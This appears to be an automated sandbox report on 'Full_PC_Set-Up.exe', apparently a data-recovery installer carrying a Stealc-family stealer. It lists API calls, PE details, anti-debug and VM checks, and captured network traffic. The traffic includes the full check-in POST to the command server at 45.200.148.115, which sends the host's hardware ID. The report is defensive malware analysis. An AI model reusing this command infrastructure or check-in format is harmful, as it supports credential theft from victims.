Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0030D910 CreateFileW,CreateFileW,GetLastError,GetLastError,swprintf,CreateFileW,GetLastError,__wsplitpath,CloseHandle,CreateFileW,GetLastError,CloseHandle,CloseHandle,ReadFile,ReadFile,WriteFile,ReadFile,WriteFile,WriteFile,ReadFile,WriteFile,WriteFile,CloseHandle,CloseHandle,OpenEncryptedFileRawW,SetFilePointer,WriteEncryptedFileRaw,CloseEncryptedFileRaw,CloseHandle,DeleteFileW,GetLastError,CloseHandle, |
0_2_0030D910 |
Source: Full_PC_Set-Up.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Full_PC_Set-Up.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: |
Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, |
0_2_00374078 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, |
0_2_002CCA90 |
Source: Network traffic |
Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 45.200.148.115:80 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.115Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD-- |
Source: Joe Sandbox View |
ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.200.148.115 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.115Connection: Keep-AliveCache-Control: no-cache |
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.facebook.com (Facebook) |
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.twitter.com (Twitter) |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.facebook.com (Facebook) |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.twitter.com (Twitter) |
Source: unknown |
HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD-- |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115 |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/ |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php2 |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpM |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpS |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpq |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://7datarecoverysoftware.com/7dptr-order/?ref=apphttp://7datarecoverysoftware.comhttp://7datarec |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp:// |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://7datarecoverysoftware.com/enable-usb-debugging/http://7datarecoverysoftware.com/usb-connect-a |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://aia.startssl.com/certs/ca.crt02 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://aia1.wosign.com/ca1g2-code3.cer0 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://aia1.wosign.com/ca1g2-ts.cer0 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://aia1.wosign.com/ca1g2.ts.cer0 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://aia1.wosign.com/ca6.code3.cer06 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://crl.startssl.com/sfsca.crl0 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://crls1.wosign.com/ca1.crl0h |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://crls1.wosign.com/ca1.crl0k |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://crls1.wosign.com/ca1g2-ts.crl0m |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://crls1.wosign.com/ca6-code3.crl0P |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://ocsp.startssl.com/ca00 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://ocsp1.wosign.com/ca10/ |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://ocsp1.wosign.com/ca102 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://ocsp1.wosign.com/ca1g2/ts0/ |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://ocsp1.wosign.com/ca6/code300 |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://www.kungsoft.com |
Source: Full_PC_Set-Up.exe |
String found in binary or memory: http://www.wosign.com/policy/0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_004B6680: _memset,DeviceIoControl, |
0_2_004B6680 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038E41F |
0_2_0038E41F |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038D97B |
0_2_0038D97B |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002BA050 |
0_2_002BA050 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002DA0C0 |
0_2_002DA0C0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003960CB |
0_2_003960CB |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00484130 |
0_2_00484130 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_004AC1A9 |
0_2_004AC1A9 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003601D0 |
0_2_003601D0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_004042B0 |
0_2_004042B0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00324370 |
0_2_00324370 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0039E486 |
0_2_0039E486 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0039C75A |
0_2_0039C75A |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00366A4A |
0_2_00366A4A |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00404AB0 |
0_2_00404AB0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0048EBD0 |
0_2_0048EBD0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00372CFB |
0_2_00372CFB |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038ED0D |
0_2_0038ED0D |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0040ED80 |
0_2_0040ED80 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003D4E30 |
0_2_003D4E30 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002F2E30 |
0_2_002F2E30 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003F8F30 |
0_2_003F8F30 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0039EF0E |
0_2_0039EF0E |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002C8FB0 |
0_2_002C8FB0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002F7030 |
0_2_002F7030 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00305140 |
0_2_00305140 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00321200 |
0_2_00321200 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00323370 |
0_2_00323370 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0040F3B0 |
0_2_0040F3B0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003853CA |
0_2_003853CA |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038D4D0 |
0_2_0038D4D0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038D5DD |
0_2_0038D5DD |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_004016E0 |
0_2_004016E0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002DB6E0 |
0_2_002DB6E0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00403710 |
0_2_00403710 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038D7B5 |
0_2_0038D7B5 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002B3800 |
0_2_002B3800 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0030F870 |
0_2_0030F870 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038D8B2 |
0_2_0038D8B2 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003399B0 |
0_2_003399B0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00407A20 |
0_2_00407A20 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0048DB70 |
0_2_0048DB70 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00391BAB |
0_2_00391BAB |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003D5B80 |
0_2_003D5B80 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00403D30 |
0_2_00403D30 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: String function: 00383725 appears 37 times |
|
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: String function: 0040E430 appears 123 times |
|
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: String function: 00388CFC appears 45 times |
|
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: String function: 0040E370 appears 60 times |
|
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: String function: 00388BEF appears 49 times |
|
Source: Full_PC_Set-Up.exe |
Static PE information: invalid certificate |
Source: Full_PC_Set-Up.exe |
Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant) |
Source: Full_PC_Set-Up.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Full_PC_Set-Up.exe |
Binary string: B\Device\HarddiskDmVolumes\%c:IOCTL_DISK_GET_DRIVE_LAYOUT_EX GetLastError %dIOCTL_DISK_GET_DRIVE_LAYOUT GetLastError %d\Device\Harddisk%u\Partition%u\\.\MountPointManager\DosDevices\\??\Volume{IOCTL_MOUNTMGR_QUERY_POINTS GetLastError %dKernel32.dllGetVolumePathNamesForVolumeNameW\\?\Volume{%s%02x%02x%02x%02x-%02x%02x-%02x%02x-}\%02x%02x-%02x%02x%02x%02x%02x%02x%sbatch_read_sector start %I64d, count: %I64dni(%d) > c_block_count |
Source: classification engine |
Classification label: mal76.troj.expl.evad.winEXE@1/0@0/1 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002CC8D0 GetDiskFreeSpaceExW, |
0_2_002CC8D0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002ECA70 GetWindowRect,CoCreateInstance,SendMessageW,SendMessageW,SendMessageW, |
0_2_002ECA70 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0036A09D __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource, |
0_2_0036A09D |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR7OIXQT.htm |
Jump to behavior |
Source: Full_PC_Set-Up.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: oledlg.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: rstrtmgr.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: Full_PC_Set-Up.exe |
Static PE information: Virtual size of .text is bigger than: 0x100000 |
Source: Full_PC_Set-Up.exe |
Static file information: File size 7230768 > 1048576 |
Source: Full_PC_Set-Up.exe |
Static PE information: Raw size of .text is bigger than: 0x100000 < 0x248800 |
Source: Full_PC_Set-Up.exe |
Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14fa00 |
Source: Full_PC_Set-Up.exe |
Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x298a00 |
Source: Full_PC_Set-Up.exe |
Static PE information: More than 200 imports for USER32.dll |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: Full_PC_Set-Up.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Full_PC_Set-Up.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe |
Source: Full_PC_Set-Up.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: Full_PC_Set-Up.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: Full_PC_Set-Up.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: Full_PC_Set-Up.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: Full_PC_Set-Up.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, |
0_2_00298550 |
Source: Full_PC_Set-Up.exe |
Static PE information: real checksum: 0x48470d should be: 0x6f0441 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00388CC7 push ecx; ret |
0_2_00388CDA |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00388D41 push ecx; ret |
0_2_00388D54 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0029A370 GetSystemDefaultLangID, push 00000419h |
0_2_0029A370 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
API coverage: 0.1 % |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, |
0_2_00374078 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, |
0_2_002CCA90 |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMware |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.000000000102F000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW> |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Process information queried: ProcessInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_003812A6 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, |
0_2_00298550 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0039FBF7 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, |
0_2_0039FBF7 |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002961A0 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, |
0_2_002961A0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_003812A6 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00381608 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00381608 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038B6F3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_0038B6F3 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_00299E20 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, |
0_2_00299E20 |
